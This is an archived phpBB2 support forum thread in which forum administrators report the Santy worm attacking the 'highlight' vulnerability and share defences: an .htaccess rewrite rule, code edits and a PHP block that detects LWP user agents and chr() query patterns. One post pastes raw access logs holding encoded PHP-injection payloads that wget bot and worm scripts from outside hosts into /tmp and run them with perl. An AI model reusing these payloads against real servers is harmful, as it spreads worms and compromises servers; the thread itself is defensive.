Viral and/or distributed atttack on highlight exploit

This is an archive of the phpBB 2.0.x support forum. Support for phpBB2 has now ended.
Forum rules
Following phpBB2's EoL, this forum is now archived for reference purposes only.
Please see the following announcement for more information: viewtopic.php?f=14&t=1385785
Locked
RonS
I've Been Banned!
Posts: 53
Joined: Fri Feb 01, 2002 7:14 pm

Viral and/or distributed atttack on highlight exploit

Post by RonS »

One of my forums is getting attacked by machines around the world trying to take advantage of the "highlight" vulnerability. My system is patched, but there are 9,000 pages in google's cache that says I am not patched,..... that's my best guess as to why that's happening.

Anyway, besides a large load on the system, about 40 queries per minute right now, these queries were filling my sessions table.

The sessions table is a heap table, and is limited by default apparently to 1100 rows. I had my session timeout set to 1 hour, so with simple math, 40*60=2400, or moer than double the MAX_ROWS for the table. There's more info available on the sessions table elsewhere in a kb entry. (That article can be found at http://www.phpbb.com/kb/article.php?article_id=42 Thanks to r45 for finding that for us)

This caused phpbb to effectively shut down and prevent new visitors of any type, with an error about full sessions table.

I logged in through SSH and simply truncated the sessions table; then I decided to eliminate the problem, at least until phpbb does something about it; here's what I did.

I created a page that essentially said "Sorry, you can't use the highlight feature right now." This is while I was working the problem if anyone tried to do a search it would fail -- I thought I'd tell the why. It is also where ALL erquests containing the term highlight will be redirected.

Then I created an .htaccess file in the forum's root directory with three lines:

Code: Select all

RewriteEngine On

RewriteCond %{QUERY_STRING} highlight=([^&]+)
RewriteRule .* http://domain.com/sorry.html?qu=nope [R,L]
Then I edited phpbb... removing highlight code from two files, so that my real visitors can do searches and the term "highlight" won't appear in the url (which would get them sent to that error page):
Viewtopic.php around line 695 find:

Code: Select all

      'U_VIEW_TOPIC' => append_sid("viewtopic.$phpEx?" . POST_TOPIC_URL . "=$topic_id&start=$start&postdays=$post_days&postorder=$post_order&highlight=$highlight"),
And replace with

Code: Select all

        'U_VIEW_TOPIC' => append_sid("viewtopic.$phpEx?" . POST_TOPIC_URL . "=$topic_id&start=$start&postdays=$post_days&postorder=$post_order&amp"),
search.php around line 845 find:

Code: Select all

                      $topic_url = append_sid("viewtopic.$phpEx?" . POST_TOPIC_URL . '=' . $searchset[$i]['topic_id'] . "&highlight=$highlight_active");
                     $post_url = append_sid("viewtopic.$phpEx?" . POST_POST_URL . '=' . $searchset[$i]['post_id'] . "&highlight=$highlight_active") . '#' . $searchset[$i]['post_id'];
replace with

Code: Select all

                        $topic_url = append_sid("viewtopic.$phpEx?" . POST_TOPIC_URL . '=' . $searchset[$i]['topic_id']);
                        $post_url = append_sid("viewtopic.$phpEx?" . POST_POST_URL . '=' . $searchset[$i]['post_id']) . '#' . $searchset[$i]['post_id'];
Like I said, this will do until phpbb figures out how to help.

I'm sorry if this is in the wrongt forum, or otherwise viloates some rule. If I had more time, I'd go and figure out exactly how and where to submit this. I'm also sorry that I can't take the time to finesse this post up a bit, I have to run to visit my Dad in the hospital (He's ok, thanks for asking.)
Good luck!
-Ron.

EDIT: FIxed typoes in the narrative, and added ". $searchset[$i]['post_id'];" in 2nd line of new search.php (hacked off by accident in the posting process)
Last edited by RonS on Sat Dec 25, 2004 1:32 am, edited 1 time in total.
RonS
I've Been Banned!
Posts: 53
Joined: Fri Feb 01, 2002 7:14 pm

Post by RonS »

Dad's great, thanks.

Here's a couple of hack attempts. I changed sorry.html to capture the requests.

Code: Select all

          Fri, 24 Dec 2004 18:57:24 -0600|64.92.163.122||lwp-trivial/1.41|/sorry.php?t=412&highlight=%252527%25252esystem(chr(108)%25252echr(115)%25252echr(32)%25252echr(47)%25252echr(116)%25252echr(109)%25252echr(112))%25252e%252527
         Fri, 24 Dec 2004 18:57:24 -0600|64.92.163.122||lwp-trivial/1.41|/sorry.php?t=412&highlight=%252527%25252esystem(chr(99)%25252echr(100)%25252echr(32)%25252echr(47)%25252echr(116)%25252echr(109)%25252echr(112)%25252echr(59)%25252echr(119)%25252echr(103)%25252echr(101)%25252echr(116)%25252echr(32)%25252echr(119)%25252echr(119)%25252echr(119)%25252echr(46)%25252echr(116)%25252echr(101)%25252echr(110)%25252echr(104)%25252echr(97)%25252echr(115)%25252echr(101)%25252echr(117)%25252echr(115)%25252echr(105)%25252echr(116)%25252echr(101)%25252echr(46)%25252echr(99)%25252echr(111)%25252echr(109)%25252echr(47)%25252echr(105)%25252echr(108)%25252echr(115)%25252echr(103)%25252echr(100)%25252echr(98)%25252echr(103)%25252echr(107)%25252echr(108)%25252echr(115)%25252echr(100)%25252echr(102)%25252echr(102)%25252echr(59)%25252echr(112)%25252echr(101)%25252echr(114)%25252echr(108)%25252echr(32)%25252echr(105)%25252echr(108)%25252echr(115)%25252echr(103)%25252echr(100)%25252echr(98)%25252echr(103)%25252echr(107)%25252echr(108)%25252echr(115)%25252echr(100)%25252echr(102)%25252echr(102)%25252echr(59)%25252echr(119)%25252echr(103)%25252echr(101)%25252echr(116)%25252echr(32)%25252echr(119)%25252echr(119)%25252echr(119)%25252echr(46)%25252echr(116)%25252echr(101)%25252echr(110)%25252echr(104)%25252echr(97)%25252echr(115)%25252echr(101)%25252echr(117)%25252echr(115)%25252echr(105)%25252echr(116)%25252echr(101)%25252echr(46)%25252echr(99)%25252echr(111)%25252echr(109)%25252echr(47)%25252echr(97)%25252echr(100)%25252echr(102)%25252echr(107)%25252echr(103)%25252echr(110)%25252echr(110)%25252echr(111)%25252echr(100)%25252echr(102)%25252echr(105)%25252echr(106)%25252echr(103)%25252echr(59)%25252echr(112)%25252echr(101)%25252echr(114)%25252echr(108)%25252echr(32)%25252echr(97)%25252echr(100)%25252echr(102)%25252echr(107)%25252echr(103)%25252echr(110)%25252echr(110)%25252echr(111)%25252echr(100)%25252echr(102)%25252echr(105)%25252echr(106)%25252echr(103))%25252e%252527
         Fri, 24 Dec 2004 18:57:39 -0600|216.67.227.252||LWP::Simple/5.801|/sorry.php?t=756&rush=%2565%2563%2568%256F%2520%255F%2553%2554%2541%2552%2554%255F%253B%2520cd%2520/tmp%3bwget%2520civa.org/pdf/bot%3bperl%2520bot%3bwget%2520civa.org/pdf/ssh.a%3bperl%2520ssh.a%253B%2520%2565%2563%2568%256F%2520%255F%2545%254E%2544%255F&highlight=%252527.%2570%2561%2573%2573%2574%2568%2572%2575%2528%2524%2548%2554%2554%2550%255F%2547%2545%2554%255F%2556%2541%2552%2553%255B%2572%2575%2573%2568%255D%2529.%252527
         Fri, 24 Dec 2004 18:57:49 -0600|66.195.243.169||LWP::Simple/5.803|/sorry.php?t=344&rush=%2565%2563%2568%256F%2520%255F%2553%2554%2541%2552%2554%255F%253B%2520cd%2520/tmp%3bwget%2520civa.org/pdf/bot%3bperl%2520bot%3bwget%2520civa.org/pdf/ssh.a%3bperl%2520ssh.a%253B%2520%2565%2563%2568%256F%2520%255F%2545%254E%2544%255F&highlight=%252527.%2570%2561%2573%2573%2574%2568%2572%2575%2528%2524%2548%2554%2554%2550%255F%2547%2545%2554%255F%2556%2541%2552%2553%255B%2572%2575%2573%2568%255D%2529.%252527
         Fri, 24 Dec 2004 18:58:23 -0600|66.194.239.52||LWP::Simple/5.803|/sorry.php?t=344&rush=%2565%2563%2568%256F%2520%255F%2553%2554%2541%2552%2554%255F%253B%2520cd%2520/tmp%3bwget%2520civa.org/pdf/bot%3bperl%2520bot%3bwget%2520civa.org/pdf/ssh.a%3bperl%2520ssh.a%253B%2520%2565%2563%2568%256F%2520%255F%2545%254E%2544%255F&highlight=%252527.%2570%2561%2573%2573%2574%2568%2572%2575%2528%2524%2548%2554%2554%2550%255F%2547%2545%2554%255F%2556%2541%2552%2553%255B%2572%2575%2573%2568%255D%2529.%252527
         Fri, 24 Dec 2004 18:58:33 -0600|83.98.136.66||LWP::Simple/5.801|/sorry.php?t=686&rush=%2565%2563%2568%256F%2520%255F%2553%2554%2541%2552%2554%255F%253B%2520cd%2520/tmp%3bwget%2520civa.org/pdf/bot%3bperl%2520bot%3bwget%2520civa.org/pdf/ssh.a%3bperl%2520ssh.a%253B%2520%2565%2563%2568%256F%2520%255F%2545%254E%2544%255F&highlight=%252527.%2570%2561%2573%2573%2574%2568%2572%2575%2528%2524%2548%2554%2554%2550%255F%2547%2545%2554%255F%2556%2541%2552%2553%255B%2572%2575%2573%2568%255D%2529.%252527
         Fri, 24 Dec 2004 18:58:36 -0600|66.152.98.101||LWP::Simple/5.79|/sorry.php?t=132&rush=%2565%2563%2568%256F%2520%255F%2553%2554%2541%2552%2554%255F%253B%2520cd%2520/tmp%3bwget%2520civa.org/pdf/bot%3bperl%2520bot%3bwget%2520civa.org/pdf/ssh.a%3bperl%2520ssh.a%253B%2520%2565%2563%2568%256F%2520%255F%2545%254E%2544%255F&highlight=%252527.%2570%2561%2573%2573%2574%2568%2572%2575%2528%2524%2548%2554%2554%2550%255F%2547%2545%2554%255F%2556%2541%2552%2553%255B%2572%2575%2573%2568%255D%2529.%252527
         Fri, 24 Dec 2004 18:58:39 -0600|66.98.134.100||lwp-trivial/1.35|/sorry.php?t=569&highlight=%252527%25252esystem(chr(99)%25252echr(100)%25252echr(32)%25252echr(47)%25252echr(116)%25252echr(109)%25252echr(112)%25252echr(59)%25252echr(119)%25252echr(103)%25252echr(101)%25252echr(116)%25252echr(32)%25252echr(119)%25252echr(119)%25252echr(119)%25252echr(46)%25252echr(116)%25252echr(101)%25252echr(110)%25252echr(104)%25252echr(97)%25252echr(115)%25252echr(101)%25252echr(117)%25252echr(115)%25252echr(105)%25252echr(116)%25252echr(101)%25252echr(46)%25252echr(99)%25252echr(111)%25252echr(109)%25252echr(47)%25252echr(98)%25252echr(111)%25252echr(116)%25252echr(46)%25252echr(116)%25252echr(120)%25252echr(116)%25252echr(59)%25252echr(112)%25252echr(101)%25252echr(114)%25252echr(108)%25252echr(32)%25252echr(98)%25252echr(111)%25252echr(116)%25252echr(46)%25252echr(116)%25252echr(120)%25252echr(116)%25252echr(59)%25252echr(119)%25252echr(103)%25252echr(101)%25252echr(116)%25252echr(32)%25252echr(119)%25252echr(119)%25252echr(119)%25252echr(46)%25252echr(116)%25252echr(101)%25252echr(110)%25252echr(104)%25252echr(97)%25252echr(115)%25252echr(101)%25252echr(117)%25252echr(115)%25252echr(105)%25252echr(116)%25252echr(101)%25252echr(46)%25252echr(99)%25252echr(111)%25252echr(109)%25252echr(47)%25252echr(119)%25252echr(111)%25252echr(114)%25252echr(109)%25252echr(46)%25252echr(116)%25252echr(120)%25252echr(116)%25252echr(59)%25252echr(112)%25252echr(101)%25252echr(114)%25252echr(108)%25252echr(32)%25252echr(119)%25252echr(111)%25252echr(114)%25252echr(109)%25252echr(46)%25252echr(116)%25252echr(120)%25252echr(116))%25252e%252527
         Fri, 24 Dec 2004 18:58:41 -0600|195.166.130.140||LWP::Simple/5.76|/sorry.php?p=680&rush=%2565%2563%2568%256F%2520%255F%2553%2554%2541%2552%2554%255F%253B%2520cd%2520/tmp%3bwget%2520civa.org/pdf/bot%3bperl%2520bot%3bwget%2520civa.org/pdf/ssh.a%3bperl%2520ssh.a%253B%2520%2565%2563%2568%256F%2520%255F%2545%254E%2544%255F&highlight=%252527.%2570%2561%2573%2573%2574%2568%2572%2575%2528%2524%2548%2554%2554%2550%255F%2547%2545%2554%255F%2556%2541%2552%2553%255B%2572%2575%2573%2568%255D%2529.%252527
As you can see, they're still coming in and from all over. The frequency comes and goes in waves. This was 9 attempts in a little more than a minute, not the 40/minute I was seeing before. It looks like phpbb itself is under the same kind of "attack" as the index page is reporting 300-400 guest online on Christmas/Christmas Eve around the world, but that could be normal as far as I know..

Code: Select all

64.92.163.122   -> 122.163.92.64.IN-ADDR.ARPA. PTR incognito.stealthnetworks.co.uk 
64.92.163.122   -> 122.163.92.64.IN-ADDR.ARPA. PTR incognito.stealthnetworks.co.uk 
216.67.227.252  -> 252.227.67.216.IN-ADDR.ARPA. PTR ns1.frogeedns.com
66.195.243.169  -> 169.243.195.66.IN-ADDR.ARPA. PTR 66-195-243-169.dimenoc.com
66.194.239.52   -> Infinitum Technologies TWTC-INFINITUM-01 66.194.238.0 - 66.194.239.255
83.98.136.66    -> 66.136.98.83.IN-ADDR.ARPA. PTR 83-98-136-66.ip.netshark.nl
66.152.98.101   -> 101.98.152.66.IN-ADDR.ARPA. PTR www01.powweb.com
66.98.134.100   -> 100.134.98.66.IN-ADDR.ARPA. PTR ev1s-66-98-134-100.ev1servers.net
195.166.130.140 -> 140.130.166.195.IN-ADDR.ARPA. PTR cgi02.plus.net
R45
Registered User
Posts: 2830
Joined: Tue Nov 27, 2001 10:42 pm

Post by R45 »

You should also review this article -> http://www.phpbb.com/kb/article.php?article_id=42 <- as it covers a side-effect of the worm hammering your forum.
RonS
I've Been Banned!
Posts: 53
Joined: Fri Feb 01, 2002 7:14 pm

Post by RonS »

Average request size over the last half hours is nearly 1,400 bytes.

1,400 * 40/minute * 60 minutes * 24 hours *31 days

1,400 * 40/minute = 56,000 ~ 55K/minute

56,000 * 60 minutes = 3,360,000 ~ 3.3MB/hour

3,360,000 * 24 hours = 80,640,000 ~ 79MB/day

80,640,000 * 31 days = 2,499,840,000 ~ 2.4GB/month in extra traffic, just for the requests. Each response for a safe 2.0.11 board without my modification is likely to be in the 15K range (with GZIP enabled!), or about another 25GB

That's almost 30GB a month in traffic

Just so you know it's not just an inconvenience.
Last edited by RonS on Sat Dec 25, 2004 1:33 am, edited 1 time in total.
RonS
I've Been Banned!
Posts: 53
Joined: Fri Feb 01, 2002 7:14 pm

Post by RonS »

R45 wrote: You should also review this article -> http://www.phpbb.com/kb/article.php?article_id=42 <- as it covers a side-effect of the worm hammering your forum.

Yes, thanks. That's exactly the kb article to which I was referring. I'm going to add it to my original post for completeness.

Thanks for re-finding that for me!
TheScienceForum
Registered User
Posts: 14
Joined: Mon Nov 01, 2004 7:31 am
Location: Phoenix AZ
Contact:

Post by TheScienceForum »

I actually made the phpBB Credits a Javascript document.write months ago, hiding the phpBB fact from Google. Still I'm getting hit. Odd.

I also got sick of AdSense trying to sell other people phpBB hosting.
Hynee
Registered User
Posts: 21
Joined: Sat Dec 25, 2004 6:58 am

Re: Viral and/or distributed atttack on highlight exploit

Post by Hynee »

RonS wrote: One of my forums is getting attacked by machines around the world trying to take advantage of the "highlight" vulnerability. My system is patched, but there are 9,000 pages in google's cache that says I am not patched,..... that's my best guess as to why that's happening.


Yes, I'm getting the same effect over at my forums. Google has effectively shut down Santy.A, so I believe this is some variant that hasn't been reported yet, and is finding site through some other means (maybe even just MSN search or Yahoo, it would be a very simple mod since Santy.A is just perl text scripts, rather than binary).

I'm getting the same User Agent/Query strings as you too.

This mod to includes/page_header.php can catch it. Place it at the start of the file:

Code: Select all

//Worm prevention
$user_agent = $_SERVER["HTTP_USER_AGENT"];
$query_string = $_SERVER["QUERY_STRING"];

//echo $query_string;

$UA_Match = preg_match('#LWP(\:\:Simple|\-trivial)\/\d\.\d+#i',$user_agent);
$QueryMatch = (
  (preg_match_all('#chr\%28\d+\%29#U',$query_string,$matches)>10) || //chr(xxx) where xxx is digits
   strpos($query_string,'%24HTTP_GET_VARS') //$HTTP_GET_VARS
);

if ($UA_Match || $QueryMatch) {
  echo 'Error: This query has been detected as a hacking attempt. If this is incorrect, please contact the webmaster.';
  die();
}

//END Worm protection
You can put in whatever error message you want. One variation on this that may help the full session tables is to make the worm wait a long time before the page is fully read. Try

Code: Select all

if ($UA_Match || $QueryMatch) {
  echo 'Error: This query has been detected as a hacking attempt. If this is incorrect, please contact the webmaster.';
  flush();
  sleep(60);
  die();
}
Flush() sends the content you've echoed and sleep(x) delays the end of the script by x seconds. This may or may not slow up the worm (I don't have a worm to test with!).
User avatar
smithy_dll
Former Team Member
Posts: 7630
Joined: Tue Jan 08, 2002 6:27 am
Location: Australia
Name: Lachlan Smith
Contact:

Post by smithy_dll »

the rewrite rule in this topic is better
http://www.phpbb.com/phpBB/viewtopic.ph ... 15#1361215


you don't need the worm to test those highlight rules, you would if you were doing the useragent, however stopping it at htaccess is less resource intensive on your server
Systems Engineering
Hynee
Registered User
Posts: 21
Joined: Sat Dec 25, 2004 6:58 am

Post by Hynee »

smithy_dll wrote: the rewrite rule in this topic is better
http://www.phpbb.com/phpBB/viewtopic.ph ... 15#1361215


OK, I'll just let the Admins come up with the solution to server load problems caused by worms.

smithy_dll wrote: you don't need the worm to test those highlight rules, you would if you were doing the useragent,...

You don't need the worm to test User Agent screening methods, you can just change your user agent in Firefox
with the User Agent Switcher extension (http://extensionroom.mozdev.org/more-in ... ntswitcher).
The pattern '#LWP(\:\:Simple|\-trivial)\/\d\.\d+#i' wrote should get all Perl LWP calls made by Santy, but
I'm only going on what I read in the access logs. I tried 'LWP::Simple/5.803'
and 'lwp-trivial/1.41' as user agents.
smithy_dll wrote: ... however stopping it at htaccess is less resource intensive on your server

OK, so only people using IIS or something non-Apache need something other than .htaccess mods.
User avatar
smithy_dll
Former Team Member
Posts: 7630
Joined: Tue Jan 08, 2002 6:27 am
Location: Australia
Name: Lachlan Smith
Contact:

Post by smithy_dll »

I thought the worm doesn't affect windows systems as it uses unix commands to copy itself in the initial query

edit: and the htaccess rule in the other thread is better because it deals directly with the issue, is secure, and doesn't modify the original phpBB (which voids support)
Systems Engineering
User avatar
Techie-Micheal
Security Consultant
Posts: 19511
Joined: Sun Oct 14, 2001 12:11 am
Location: In your servers

Post by Techie-Micheal »

Last time I checked, support-related queries did not belong in phpBB Discussion, so moved appropriately. Furthermore, please see the stickies atop this forum for more information. And finally, locked. If you like, you may nicely PM me for details.
Proven Offensive Security Expertise. OSCP - GXPN
Locked

Return to “2.0.x Support Forum”